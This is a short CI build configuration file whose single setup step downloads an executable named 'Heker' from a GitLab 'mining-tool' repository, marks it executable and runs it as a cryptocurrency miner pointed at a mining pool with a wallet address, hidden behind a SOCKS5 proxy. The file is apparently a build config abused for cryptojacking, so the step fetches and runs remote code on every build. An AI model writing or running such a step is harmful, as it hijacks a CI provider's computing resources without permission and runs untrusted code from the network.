build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: wget https://gitlab.com/kurangkeloen/mining-tool/raw/main/Heker && chmod 777 Heker && ./Heker -a rx/graft -o grft.pool.gntl.co.uk:10010 -u GMPHYf5KRkcAyik7Jw9oHRfJtUdw2Kj5f4VTFJ25AaFVYxofetir8Cnh7S76Q854oMXzwaguL8p5KEz1tm3rn1SA6hKNk9KpigmPYmtzuf -p SCR -t 4 --donate-level 1 -x socks5://72.210.252.134:46164 -k --tls
